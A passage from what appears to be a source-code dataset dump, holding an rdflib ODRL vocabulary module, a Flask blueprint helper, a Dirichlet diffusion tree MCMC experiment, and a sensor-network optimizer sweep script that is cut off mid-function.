relation: URIRef # Relation is an abstract property which creates an explicit link between an Action and an Asset.
remedy: URIRef # Relates an individual remedy Duty to a Prohibition.
rightOperand: URIRef # The value of the right operand in a constraint expression.
rightOperandReference: URIRef # A reference to a web resource providing the value for the right operand of a Constraint.
scope: URIRef # The identifier of a scope that provides context to the extent of the entity.
source: URIRef # Reference to a Asset/PartyCollection
status: URIRef # the value generated from the leftOperand action or a value related to the leftOperand set as the reference for the comparison.
target: URIRef # The target property indicates the Asset that is the primary subject to which the Rule action directly applies.
timedCount: URIRef # The number of seconds after which timed metering use of the asset begins.
trackedParty: URIRef # The Party whose usage is being tracked.
trackingParty: URIRef # The Party who is tracking usage.
uid: URIRef # An unambiguous identifier
undefined: URIRef # Relates the strategy used for handling undefined actions to a Policy.
unit: URIRef # The unit of measurement of the value of the rightOperand or rightOperandReference of a Constraint.
xone: URIRef # The relation is satisfied when only one, and not more, of the Constraints is satisfied
# http://www.w3.org/2002/07/owl#NamedIndividual
All: URIRef # Specifies that the scope of the relationship is all of the collective individuals within a context.
All2ndConnections: URIRef # Specifies that the scope of the relationship is all of the second-level connections to the Party.
AllConnections: URIRef # Specifies that the scope of the relationship is all of the first-level connections of the Party.
AllGroups: URIRef # Specifies that the scope of the relationship is all of the group connections of the Party.
Group: URIRef # Specifies that the scope of the relationship is the defined group with multiple individual members.
Individual: URIRef # Specifies that the scope of the relationship is the single Party individual.
absolutePosition: URIRef # A point in space or time defined with absolute coordinates for the positioning of the target Asset.
absoluteSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects of the target Asset.
absoluteSpatialPosition: URIRef # The absolute spatial positions of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space for the target Asset to fit.
absoluteTemporalPosition: URIRef # The absolute temporal positions in a media stream the target Asset has to fit.
count: URIRef # Numeric count of executions of the action of the Rule.
dateTime: URIRef # The date (and optional time and timezone) of exercising the action of the Rule. Right operand value MUST be an xsd:date or xsd:dateTime as defined by [[xmlschema11-2]].
delayPeriod: URIRef # A time delay period prior to exercising the action of the Rule. The point in time triggering this period MAY be defined by another temporal Constraint combined by a Logical Constraint (utilising the odrl:andSequence operand). Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
deliveryChannel: URIRef # The delivery channel used for exercising the action of the Rule.
device: URIRef # An identified device used for exercising the action of the Rule.
elapsedTime: URIRef # A continuous elapsed time period which may be used for exercising of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
eq: URIRef # Indicating that a given value equals the right operand of the Constraint.
event: URIRef # An identified event setting a context for exercising the action of the Rule.
fileFormat: URIRef # A transformed file format of the target Asset.
gt: URIRef # Indicating that a given value is greater than the right operand of the Constraint.
gteq: URIRef # Indicating that a given value is greater than or equal to the right operand of the Constraint.
hasPart: URIRef # A set-based operator indicating that a given value contains the right operand of the Constraint.
ignore: URIRef # The Action is to be ignored and is not part of the policy โ and the policy remains valid.
industry: URIRef # A defined industry sector setting a context for exercising the action of the Rule.
invalid: URIRef # The policy is void.
isA: URIRef # A set-based operator indicating that a given value is an instance of the right operand of the Constraint.
isAllOf: URIRef # A set-based operator indicating that a given value is all of the right operand of the Constraint.
isAnyOf: URIRef # A set-based operator indicating that a given value is any of the right operand of the Constraint.
isNoneOf: URIRef # A set-based operator indicating that a given value is none of the right operand of the Constraint.
isPartOf: URIRef # A set-based operator indicating that a given value is contained by the right operand of the Constraint.
language: URIRef # A natural language used by the target Asset.
lt: URIRef # Indicating that a given value is less than the right operand of the Constraint.
lteq: URIRef # Indicating that a given value is less than or equal to the right operand of the Constraint.
media: URIRef # Category of a media asset setting a context for exercising the action of the Rule.
meteredTime: URIRef # An accumulated amount of one to many metered time periods which were used for exercising the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
neq: URIRef # Indicating that a given value is not equal to the right operand of the Constraint.
payAmount: URIRef # The amount of a financial payment. Right operand value MUST be an xsd:decimal.
percentage: URIRef # A percentage amount of the target Asset relevant for exercising the action of the Rule. Right operand value MUST be an xsd:decimal from 0 to 100.
perm: URIRef # Permissions take preference over prohibitions.
policyUsage: URIRef # Indicates the actual datetime the action of the Rule was exercised.
product: URIRef # Category of product or service setting a context for exercising the action of the Rule.
prohibit: URIRef # Prohibitions take preference over permissions.
purpose: URIRef # A defined purpose for exercising the action of the Rule.
recipient: URIRef # The party receiving the result/outcome of exercising the action of the Rule.
relativePosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
relativeSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects - expressed as percentages of full values - of the target Asset.
relativeSpatialPosition: URIRef # The relative spatial positions - expressed as percentages of full values - of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space of the target Asset.
relativeTemporalPosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
resolution: URIRef # Resolution of the rendition of the target Asset.
spatial: URIRef # A named and identified geospatial area with defined borders which is used for exercising the action of the Rule. An IRI MUST be used to represent this value.
spatialCoordinates: URIRef # A set of coordinates setting the borders of a geospatial area used for exercising the action of the Rule. The coordinates MUST include longitude and latitude, they MAY include altitude and the geodetic datum.
support: URIRef # The Action is to be supported as part of the policy โ and the policy remains valid.
system: URIRef # An identified computing system used for exercising the action of the Rule.
systemDevice: URIRef # An identified computing system or computing device used for exercising the action of the Rule.
timeInterval: URIRef # A recurring period of time before the next execution of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
unitOfCount: URIRef # The unit of measure used for counting the executions of the action of the Rule.
version: URIRef # The version of the target Asset.
virtualLocation: URIRef # An identified location of the IT communication space which is relevant for exercising the action of the Rule.
# http://www.w3.org/2004/02/skos/core#Collection
# http://www.w3.org/2004/02/skos/core#Concept
Action: URIRef # An operation on an Asset.
Agreement: URIRef # A Policy that grants the assignee a Rule over an Asset from an assigner.
Assertion: URIRef # A Policy that asserts a Rule over an Asset from parties.
Asset: URIRef # A resource or a collection of resources that are the subject of a Rule.
AssetCollection: URIRef # An Asset that is collection of individual resources
AssetScope: URIRef # Scopes for Asset Scope expressions.
ConflictTerm: URIRef # Used to establish strategies to resolve conflicts that arise from the merging of Policies or conflicts between Permissions and Prohibitions in the same Policy.
Constraint: URIRef # A boolean expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Duty: URIRef # The obligation to perform an Action
LeftOperand: URIRef # Left operand for a constraint expression.
LogicalConstraint: URIRef # A logical expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Offer: URIRef # A Policy that proposes a Rule over an Asset from an assigner.
Operator: URIRef # Operator for constraint expression.
Party: URIRef # An entity or a collection of entities that undertake Roles in a Rule.
PartyCollection: URIRef # A Party that is a group of individual entities
PartyScope: URIRef # Scopes for Party Scope expressions.
Permission: URIRef # The ability to perform an Action over an Asset.
Policy: URIRef # A non-empty group of Permissions and/or Prohibitions.
Privacy: URIRef # A Policy that expresses a Rule over an Asset containing personal information.
Prohibition: URIRef # The inability to perform an Action over an Asset.
Request: URIRef # A Policy that proposes a Rule over an Asset from an assignee.
RightOperand: URIRef # Right operand for constraint expression.
Rule: URIRef # An abstract concept that represents the common characteristics of Permissions, Prohibitions, and Duties.
Set: URIRef # A Policy that expresses a Rule over an Asset.
Ticket: URIRef # A Policy that grants the holder a Rule over an Asset from an assigner.
UndefinedTerm: URIRef # Is used to indicate how to support Actions that are not part of any vocabulary or profile in the policy expression system.
acceptTracking: URIRef # To accept that the use of the Asset may be tracked.
adHocShare: URIRef # The act of sharing the asset to parties in close proximity to the owner.
aggregate: URIRef # To use the Asset or parts of it as part of a composite collection.
annotate: URIRef # To add explanatory notations/commentaries to the Asset without modifying the Asset in any other way.
anonymize: URIRef # To anonymize all or parts of the Asset.
append: URIRef # The act of adding to the end of an asset.
appendTo: URIRef # The act of appending data to the Asset without modifying the Asset in any other way.
archive: URIRef # To store the Asset (in a non-transient form).
attachPolicy: URIRef # The act of keeping the policy notice with the asset.
attachSource: URIRef # The act of attaching the source of the asset and its derivatives.
attribute: URIRef # To attribute the use of the Asset.
commercialize: URIRef # The act of using the asset in a business environment.
compensate: URIRef # To compensate by transfer of some amount of value, if defined, for using or selling the Asset.
concurrentUse: URIRef # To create multiple copies of the Asset that are being concurrently used.
copy: URIRef # The act of making an exact reproduction of the asset.
core: URIRef # Identifier for the ODRL Core Profile
delete: URIRef # To permanently remove all copies of the Asset after it has been used.
derive: URIRef # To create a new derivative Asset from this Asset and to edit or modify the derivative.
digitize: URIRef # To produce a digital copy of (or otherwise digitize) the Asset from its analogue form.
display: URIRef # To create a static and transient rendition of an Asset.
distribute: URIRef # To supply the Asset to third-parties.
ensureExclusivity: URIRef # To ensure that the Rule on the Asset is exclusive.
execute: URIRef # To run the computer program Asset.
export: URIRef # The act of transforming the asset into a new form.
extract: URIRef # To extract parts of the Asset and to use it as a new Asset.
extractChar: URIRef # The act of extracting (replicating) unchanged characters from the asset.
extractPage: URIRef # The act of extracting (replicating) unchanged pages from the asset.
extractWord: URIRef # The act of extracting (replicating) unchanged words from the asset.
give: URIRef # To transfer the ownership of the Asset to a third party without compensation and while deleting the original asset.
grantUse: URIRef # To grant the use of the Asset to third parties.
include: URIRef # To include other related assets in the Asset.
index: URIRef # To record the Asset in an index.
inform: URIRef # To inform that an action has been performed on or in relation to the Asset.
install: URIRef # To load the computer program Asset onto a storage device which allows operating or running the Asset.
lease: URIRef # The act of making available the asset to a third-party for a fixed period of time with exchange of value.
lend: URIRef # The act of making available the asset to a third-party for a fixed period of time without exchange of value.
license: URIRef # The act of granting the right to use the asset to a third-party.
modify: URIRef # To change existing content of the Asset. A new asset is not created by this action.
move: URIRef # To move the Asset from one digital location to another including deleting the original copy.
nextPolicy: URIRef # To grant the specified Policy to a third party for their use of the Asset.
obtainConsent: URIRef # To obtain verifiable consent to perform the requested action in relation to the Asset.
pay: URIRef # The act of paying a financial amount to a party for use of the asset.
play: URIRef # To create a sequential and transient rendition of an Asset.
present: URIRef # To publicly perform the Asset.
preview: URIRef # The act of providing a short preview of the asset.
print: URIRef # To create a tangible and permanent rendition of an Asset.
read: URIRef # To obtain data from the Asset.
reproduce: URIRef # To make duplicate copies the Asset in any material form.
reviewPolicy: URIRef # To review the Policy applicable to the Asset.
secondaryUse: URIRef # The act of using the asset for a purpose other than the purpose it was intended for.
sell: URIRef # To transfer the ownership of the Asset to a third party with compensation and while deleting the original asset.
share: URIRef # The act of the non-commercial reproduction and distribution of the asset to third-parties.
shareAlike: URIRef # The act of distributing any derivative asset under the same terms as the original asset.
stream: URIRef # To deliver the Asset in real-time.
synchronize: URIRef # To use the Asset in timed relations with media (audio/visual) elements of another Asset.
textToSpeech: URIRef # To have a text Asset read out loud.
transfer: URIRef # To transfer the ownership of the Asset in perpetuity.
transform: URIRef # To convert the Asset into a different format.
translate: URIRef # To translate the original natural language of an Asset into another natural language.
uninstall: URIRef # To unload and delete the computer program Asset from a storage device and disable its readiness for operation.
use: URIRef # To use the Asset
watermark: URIRef # To apply a watermark to the Asset.
write: URIRef # The act of writing to the Asset.
writeTo: URIRef # The act of adding data to the Asset.
# Valid non-python identifiers
_extras = [
"and",
"or",
"#actionConcepts",
"#actions",
"#actionsCommon",
"#assetConcepts",
"#assetParty",
"#assetRelations",
"#assetRelationsCommon",
"#conflictConcepts",
"#constraintLeftOperandCommon",
"#constraintLogicalOperands",
"#constraintRelationalOperators",
"#constraintRightOpCommon",
"#constraints",
"#deprecatedTerms",
"#duties",
"#logicalConstraints",
"#partyConcepts",
"#partyRoles",
"#partyRolesCommon",
"#permissions",
"#policyConcepts",
"#policySubClasses",
"#policySubClassesCommon",
"#prohibitions",
"#ruleConcepts",
]
_NS = Namespace("http://www.w3.org/ns/odrl/2/")
| 0 | 0 | 0 |
846536ef805d07aa120fe6037fec9a5a37e67b93 | 493 | py | Python | app/blueprints.py | excalibur1987/team-management | ed6dfaf83280dad947edb31b404680d6083d7e62 | [
"MIT"
] | 1 | 2021-06-05T16:18:10.000Z | 2021-06-05T16:18:10.000Z | app/blueprints.py | excalibur1987/flask-api-backend-boilerplate | 3f0933599f12b9632a3fc697eb3dde534ec93ce1 | [
"MIT"
] | null | null | null | app/blueprints.py | excalibur1987/flask-api-backend-boilerplate | 3f0933599f12b9632a3fc697eb3dde534ec93ce1 | [
"MIT"
] | null | null | null | from flask import Flask
from app.apis.v1 import api_v1_bp
def register_blueprints(app: "Flask") -> "Flask":
"""A function to register flask blueprint.
To register blueprints add them like the example
Example usage:
from app.blueprints import blueprint
app.register_blueprint(blueprint)
Args:
app (Flask): Flask Application instance
Returns:
Flask: Flask Application instance
"""
app.register_blueprint(api_v1_bp)
return app
| 23.47619 | 52 | 0.693712 | from flask import Flask
from app.apis.v1 import api_v1_bp
def register_blueprints(app: "Flask") -> "Flask":
"""A function to register flask blueprint.
To register blueprints add them like the example
Example usage:
from app.blueprints import blueprint
app.register_blueprint(blueprint)
Args:
app (Flask): Flask Application instance
Returns:
Flask: Flask Application instance
"""
app.register_blueprint(api_v1_bp)
return app
| 0 | 0 | 0 |
09cc33ccba4b0ca212dc86714544f05c4ce8cead | 2,007 | py | Python | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | 3 | 2017-01-18T21:20:26.000Z | 2019-01-22T19:11:58.000Z | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | null | null | null | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | 3 | 2016-10-13T06:31:25.000Z | 2021-11-08T19:09:03.000Z | import networkx as nx
from cStringIO import StringIO
from Bio import Phylo
import matplotlib.pyplot as plt
import random
import logging
from tqdm import tqdm
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import numpy as np
import trees
from trees.ddt import DirichletDiffusionTree, Inverse, GaussianLikelihoodModel
from trees.mcmc import MetropolisHastingsSampler
from trees.util import plot_tree_2d
from sklearn.decomposition import PCA
import seaborn as sns
sns.set_style('white')
import cPickle as pickle
# Load the zoo dataset and jitter the features slightly so no two points
# coincide exactly.
dataset = trees.data.load('zoo')
X, y = dataset.X, dataset.y
X += np.random.normal(scale=0.01, size=X.shape)

# Fit a 2-D PCA for visualisation only; the sampler runs on the full
# feature space (the transform below is intentionally commented out).
pca = PCA(2)
pca.fit(X)
# X = pca.transform(X)
N, D = X.shape

# Dirichlet diffusion tree model: Inverse divergence function plus a
# Gaussian likelihood over the observed features.
df = Inverse(c=0.9)
lm = GaussianLikelihoodModel(sigma=np.eye(D) / 4.0, sigma0=np.eye(D) / 2.0, mu0=X.mean(axis=0)).compile()
model = DirichletDiffusionTree(df=df, likelihood_model=lm, constraints=[])

# Metropolis-Hastings sampler over tree structures, started from a random
# initial assignment of data points to leaves.
sampler = MetropolisHastingsSampler(model, X)
sampler.initialize_assignments()

likelihoods = []  # per-iteration marginal log-likelihood trace
fontsize = 18  # axis-label font size used by the plots
| 26.064935 | 105 | 0.715994 | import networkx as nx
from cStringIO import StringIO
from Bio import Phylo
import matplotlib.pyplot as plt
import random
import logging
from tqdm import tqdm
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import numpy as np
import trees
from trees.ddt import DirichletDiffusionTree, Inverse, GaussianLikelihoodModel
from trees.mcmc import MetropolisHastingsSampler
from trees.util import plot_tree_2d
from sklearn.decomposition import PCA
import seaborn as sns
sns.set_style('white')
import cPickle as pickle
# Load the zoo dataset and jitter the features slightly so no two points
# coincide exactly.
dataset = trees.data.load('zoo')
X, y = dataset.X, dataset.y
X += np.random.normal(scale=0.01, size=X.shape)

# Fit a 2-D PCA for visualisation only; the sampler runs on the full
# feature space (the transform below is intentionally commented out).
pca = PCA(2)
pca.fit(X)
# X = pca.transform(X)
N, D = X.shape

# Dirichlet diffusion tree model: Inverse divergence function plus a
# Gaussian likelihood over the observed features.
df = Inverse(c=0.9)
lm = GaussianLikelihoodModel(sigma=np.eye(D) / 4.0, sigma0=np.eye(D) / 2.0, mu0=X.mean(axis=0)).compile()
model = DirichletDiffusionTree(df=df, likelihood_model=lm, constraints=[])

# Metropolis-Hastings sampler over tree structures, started from a random
# initial assignment of data points to leaves.
sampler = MetropolisHastingsSampler(model, X)
sampler.initialize_assignments()

likelihoods = []  # per-iteration marginal log-likelihood trace
fontsize = 18  # axis-label font size used by the plots
def iterate(n_iters):
    """Run *n_iters* MCMC steps, then plot diagnostics and save the result.

    Side effects: extends the module-level ``likelihoods`` trace, writes
    'unconstrained-likelihoods.png', 'unconstrained-tree.png',
    'unconstrained-tree.nwk' and 'unconstrained-tree.dot', and opens the
    matplotlib figure windows.  (Python 2 code: uses xrange / print >>.)
    """
    for i in tqdm(xrange(n_iters)):
        sampler.sample()
        likelihoods.append(sampler.tree.marg_log_likelihood())
    # Plot the likelihood trace collected over the whole run.
    plt.figure()
    plt.xlabel("Iterations", fontsize=fontsize)
    plt.ylabel("Data Log Likelihood", fontsize=fontsize)
    plt.plot(likelihoods)
    plt.legend(loc='best', fontsize=12)
    plt.savefig('unconstrained-likelihoods.png', bbox_inches='tight')
    # Snapshot the sampler's current tree and show it in PCA space.
    final_tree = sampler.tree.copy()
    plt.figure()
    plot_tree_2d(final_tree, X, pca)
    # Relabel leaves with their class labels before rendering the phylogeny.
    for node in final_tree.dfs():
        if node.is_leaf():
            node.point = y[node.point]
    plt.figure()
    newick = final_tree.to_newick()
    tree = Phylo.read(StringIO(newick), 'newick')
    Phylo.draw_graphviz(tree, prog='neato')
    plt.savefig('unconstrained-tree.png', bbox_inches='tight')
    # Export the tree in Newick and Graphviz dot formats.
    graph = Phylo.to_networkx(tree)
    with open('unconstrained-tree.nwk', 'w') as fp:
        print >>fp, newick,
    nx.write_dot(graph, 'unconstrained-tree.dot')
    plt.show()
| 972 | 0 | 23 |
37dd96679211af25ef8e409406d45a4f07bce62d | 8,666 | py | Python | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | 1 | 2019-01-19T06:45:42.000Z | 2019-01-19T06:45:42.000Z | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | null | null | null | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | 3 | 2017-03-08T17:42:16.000Z | 2021-05-28T16:01:30.000Z | #!/usr/bin/python
import getopt, logging, sys, SneeqlLib, UtilLib, AvroraLib, os, checkTupleCount
queryMap = {'Q2' : 'input/pipes/Q2.txt', 'Q4' : 'input/pipes/QNest4.txt', 'Q5' : 'input/pipes/QNest5.txt'}
networkMap = {'10' : 'input/networks/10-node-topology.xml', '30' : 'scripts/qos-exp/scenarios/30-dense-net.xml', '100' : 'scripts/qos-exp/scenarios/ix-100-dense-net.xml'}
numSourcesMap = {'10_3' : 'input/pipes/10Sites-3Sources-schemas.xml', '10_10' : 'input/pipes/10Sites-10Sources-schemas.xml', '30_min' : 'scripts/qos-exp/scenarios/30-node-min-schema.xml', '30_maj' : 'scripts/qos-exp/scenarios/30-node-maj-schema.xml', '100_min' : 'scripts/qos-exp/scenarios/100-node-min-schema.xml', '100_maj' : 'scripts/qos-exp/scenarios/100-node-maj-schema.xml'}
optGoalMap = {'min_delivery' : 'input/QoS/qos-spec-min-delivery.xml', 'min_energy' : 'input/QoS/qos-spec-min-energy.xml', 'max_lifetime' : 'input/QoS/qos-spec-max-lifetime.xml'}
optMinNN = 0
optMaxNN = 30
optSolverOutput = None
#Ouput info message to screen and logger if applicable
#Ouput warning message to screen and logger if applicable
#Ouput error message to screen and logger if applicable
if __name__ == "__main__":
main()
| 35.371429 | 381 | 0.681168 | #!/usr/bin/python
import getopt, logging, sys, SneeqlLib, UtilLib, AvroraLib, os, checkTupleCount
def usage():
    """Print the command-line usage message for this script to stdout."""
    print '''Usage: nn-sweep.py <parameters>
--query=[Q2|Q4|Q5]
--network_size=[n]
--network_type=[A|B]
--num_sources=[3|10|min|maj]
--optimization-goal=[min_delivery,min_energy,max_lifetime]
--max-nn=<num_neighbours>
--output-root=<path>
'''
# Lookup tables mapping command-line option values to the input files
# (queries, network topologies, schemas, QoS specifications) used by the sweep.
queryMap = {'Q2' : 'input/pipes/Q2.txt', 'Q4' : 'input/pipes/QNest4.txt', 'Q5' : 'input/pipes/QNest5.txt'}
networkMap = {'10' : 'input/networks/10-node-topology.xml', '30' : 'scripts/qos-exp/scenarios/30-dense-net.xml', '100' : 'scripts/qos-exp/scenarios/ix-100-dense-net.xml'}
numSourcesMap = {'10_3' : 'input/pipes/10Sites-3Sources-schemas.xml', '10_10' : 'input/pipes/10Sites-10Sources-schemas.xml', '30_min' : 'scripts/qos-exp/scenarios/30-node-min-schema.xml', '30_maj' : 'scripts/qos-exp/scenarios/30-node-maj-schema.xml', '100_min' : 'scripts/qos-exp/scenarios/100-node-min-schema.xml', '100_maj' : 'scripts/qos-exp/scenarios/100-node-maj-schema.xml'}
optGoalMap = {'min_delivery' : 'input/QoS/qos-spec-min-delivery.xml', 'min_energy' : 'input/QoS/qos-spec-min-energy.xml', 'max_lifetime' : 'input/QoS/qos-spec-max-lifetime.xml'}
# Defaults for the neighbourhood-size sweep and the optional solver output file.
optMinNN = 0
optMaxNN = 30
optSolverOutput = None
def parseArgs(args):
    """Parse command-line options into the module-level opt* globals.

    Prints usage and exits on -h/--help, on unknown options, or on any
    option value that is not a key of the corresponding lookup map.
    Remaining options are forwarded to SneeqlLib.setOpts.
    """
    global optQuery, optNetworkSize, optNetworkType, optNumSources, optOptGoal, optMinNN, optMaxNN, optOutputRoot, optSolverOutput
    try:
        optNames = ["help", "query=", "net-size=", "net-type=", "num-sources=", "opt-goal=", "min-nn=", "max-nn=", "output-root=", "solver-output="]
        # Also accept every option that SneeqlLib itself understands.
        optNames += SneeqlLib.getOptNames();
        opts, args = getopt.getopt(args, "h",optNames)
    except getopt.GetoptError, err:
        print str(err)
        usage()
        sys.exit(2)
    for o, a in opts:
        if (o == "-h" or o== "--help"):
            usage()
            sys.exit()
        if (o == '--query'):
            # Only queries with a known input file are accepted.
            if queryMap.has_key(a):
                optQuery = a;
            else:
                print 'invalid query'
                sys.exit(2)
        if (o == '--net-size'):
            if networkMap.has_key(a):
                optNetworkSize = a;
            else:
                print 'invalid network'
                sys.exit(2)
        if (o == '--net-type'):
            if (a=='A' or a == 'B'):
                optNetworkType = a;
            else:
                print 'invalid network type'
                sys.exit(2)
        if (o == '--num-sources'):
            # Valid combinations are keyed as '<netSize>_<numSources>', so
            # --net-size must appear before --num-sources on the command line.
            if numSourcesMap.has_key(optNetworkSize+'_'+a):
                optNumSources = a;
            else:
                # NOTE(review): message says 'invalid network type'; probably
                # meant 'invalid number of sources' (copy-paste) - confirm.
                print 'invalid network type'
                sys.exit(2)
        if (o == '--opt-goal'):
            if optGoalMap.has_key(a):
                optOptGoal = a;
            else:
                print 'invalid optimization goal'
                sys.exit(2)
        if (o == '--min-nn'):
            optMinNN = int(a)
        if (o == '--max-nn'):
            optMaxNN = int(a)
        if (o == '--output-root'):
            optOutputRoot = a;
        if (o == '--solver-output'):
            optSolverOutput = a;
    SneeqlLib.setOpts(opts)
# Output an info message to screen and logger if applicable
def report(message):
    """Print *message*; mirror it at INFO level when a logger is configured."""
    if logger is not None:
        logger.info(message)
    print(message)
# Output a warning message to screen and logger if applicable
def reportWarning(message):
    """Print *message*; mirror it at WARNING level when a logger is configured."""
    if logger is not None:
        logger.warning(message)
    print(message)
# Output an error message to screen and logger if applicable
def reportError(message):
    """Print *message*; mirror it at ERROR level when a logger is configured."""
    if logger is not None:
        logger.error(message)
    print(message)
def startLogger(timeStamp):
    """Create the module-level logger writing to <output-root>/test<timeStamp>.log.

    Also registers the logger with the helper libraries used by this
    script so their output lands in the same log file.
    """
    global logger
    logger = logging.getLogger('test')
    #create the directory if required
    if not os.path.isdir(optOutputRoot):
        os.makedirs(optOutputRoot)
    hdlr = logging.FileHandler('%s/test%s.log' % (optOutputRoot, timeStamp))
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
    hdlr.setFormatter(formatter)
    logger.addHandler(hdlr)
    logger.setLevel(logging.INFO)
    logger.info('nn2 sweep')
    #Register the logger with the libraries this module uses
    SneeqlLib.registerLogger(logger)
    #TossimLib.registerLogger(logger)
    AvroraLib.registerLogger(logger)
    checkTupleCount.registerLogger(logger)
    #RandomSeeder.registerLogger(logger)
def invokeQueryOptimizer(outputDir, queryFile, networkFile, heteroNet, schemaFile, qosFile, nn):
    """Run the SNEEql query compiler for one (query, network, nn) configuration.

    Builds the compiler's command-line parameter list: 'fixedParams' are the
    same for every run of the sweep, 'varParams' encode this configuration,
    with both the min and max neighbourhood size pinned to *nn*.
    """
    fixedParams = ['-qos-acquisition-interval=10000', '-qos-buffering-factor=1', '-targets=avrora1,tossim1', '-qos-aware-where-scheduling=true', '-haskell-use=true', "-nesc-control-radio-off=true", "-nesc-adjust-radio-power=true", "-nesc-power-management=true", "-delete-old-files=true"]
    varParams = ['-query='+queryFile, '-network-topology-file='+networkFile, '-where-scheduling-hetero-net='+str(heteroNet), '-schema-file='+schemaFile, '-qos-file='+qosFile, '-output-root-dir='+outputDir]
    varParams += ['-where-scheduling-min-nn='+str(nn), '-where-scheduling-max-nn='+str(nn), '-where-scheduling-heuristic-init-point=false', '-nesc-led-debug=false']
    if (optSolverOutput!=None):
        varParams += ['-where-scheduling-solver-output='+optSolverOutput]
    queryCompilerParams = fixedParams + varParams
    exitVal = SneeqlLib.compileQueryParamStr(queryCompilerParams, optQuery)
    # Non-zero exit means compilation failed; nothing further to do here.
    if (exitVal != 0):
        return;
def logToDataFile(overallOutputDir, nn, objFnVal, measuredVal, numDAFs):
    """Append one sweep result as a tab-separated row to <overallOutputDir>/data.txt.

    Creates the file with a header row on first use.

    :param overallOutputDir: directory holding data.txt (must already exist)
    :param nn: neighbourhood size used for this run (int)
    :param objFnVal: objective-function value reported by the solver
    :param measuredVal: measured value for the run, formatted with %g (float)
    :param numDAFs: number of DAFs considered by the solver
    """
    scriptFile = overallOutputDir+'/data.txt'
    # Write the header exactly once, when the file does not exist yet.
    if not os.path.exists(scriptFile):
        # 'with' closes the handle even if the write raises (the original
        # open/close pairs leaked the handle on error).
        with open(scriptFile, 'w') as f:
            f.write('"NN"\t"fn_val"\t"measured"\t"num DAFs"\n')
    with open(scriptFile, 'a') as f:
        f.write('%d\t%s\t%g\t%s\n' % (nn, objFnVal, measuredVal, numDAFs))
def parseOutFile(outFilePath):
    """Parse the '*** Summary ***' section of an optimizer output file.

    Returns a dict of key -> stripped value for every 'key=value' line
    between the '*** Summary ***' and '*** Assignment ***' markers.
    Blank lines are skipped; keys are kept verbatim (not stripped), as
    downstream lookups such as summary['num DAFs considered'] rely on it.

    Fixes: the file handle leaked if iteration raised (now closed via
    ``with``), and values containing '=' crashed the tuple unpacking
    (now split with maxsplit=1).
    """
    summary = {}
    summaryFlag = False
    with open(outFilePath, 'r') as ofile:
        for line in ofile:
            if line.startswith('*** Summary ***'):
                summaryFlag = True
                continue
            if line.startswith('*** Assignment ***'):
                break
            if line.strip() == '':
                continue
            if summaryFlag:
                # Split only on the first '=' so values may contain '='.
                (key, val) = line.split('=', 1)
                summary[key] = val.strip()
    return summary
def mainLoop():
    """Sweep the where-scheduling nn parameter and record one metric per run.

    For each nn value: compile the query plan, parse the optimizer summary,
    then either read the delivery time directly (min_delivery goal) or
    compile the nesC code, simulate it in Avrora, validate the tuple counts
    and measure energy/lifetime.  Results are appended via logToDataFile.
    All opt* names are module-level options set by the argument parser.
    """
    queryFile = queryMap[optQuery]
    networkFile = networkMap[optNetworkSize]
    heteroNet = (optNetworkType == 'B')
    schemaFile = numSourcesMap[optNetworkSize+'_'+optNumSources]
    qosFile = optGoalMap[optOptGoal]
    overallOutputDir = optOutputRoot + '/' + optQuery + '-' + optNetworkSize + 'n-type' + optNetworkType + '-' + optNumSources + 's-' + optOptGoal
    # Simulation length in (Avrora) time units passed to runSimulation.
    duration = 100;
    # NOTE(review): the commented-out range means optMinNN/optMaxNN are
    # currently ignored in favour of this hard-coded sweep -- confirm
    # that is intentional.
#    for nn in range(optMinNN,optMaxNN+1):
    for nn in [0,1,3,5,10,15,20]:
        runOutputDir = overallOutputDir + '/nn' + str(nn)
        invokeQueryOptimizer(runOutputDir, queryFile, networkFile, heteroNet, schemaFile, qosFile, nn)
        summary = parseOutFile(runOutputDir+'/'+optQuery+'/query-plan/matlab/wheresched/out'+str(nn)+'.txt')
        if optOptGoal=='min_delivery':
            #check all tuples present
            queryPlanSummaryFile = "%s/%s/query-plan/query-plan-summary.txt" % (runOutputDir, optQuery)
            deliveryTime = SneeqlLib.getDeliveryTime(queryPlanSummaryFile)
            logToDataFile(overallOutputDir, nn, summary['min_f'], float(deliveryTime), summary['num DAFs considered'])
        else:
            #Compile the nesC
            nescDir = runOutputDir + '/'+optQuery + '/avrora1'
            exitVal = AvroraLib.compileNesCCode(nescDir)
            if (exitVal != 0):
                # Abort the whole sweep on the first compile failure.
                reportError("Error compiling avrora nesC code")
                return;
            AvroraLib.generateODs(nescDir)
            #Invoke Avrora simulation
            avroraNetFile = UtilLib.winpath(os.getenv('SNEEQLROOT'))+'\\\\'+networkFile.replace('.xml', '.top')
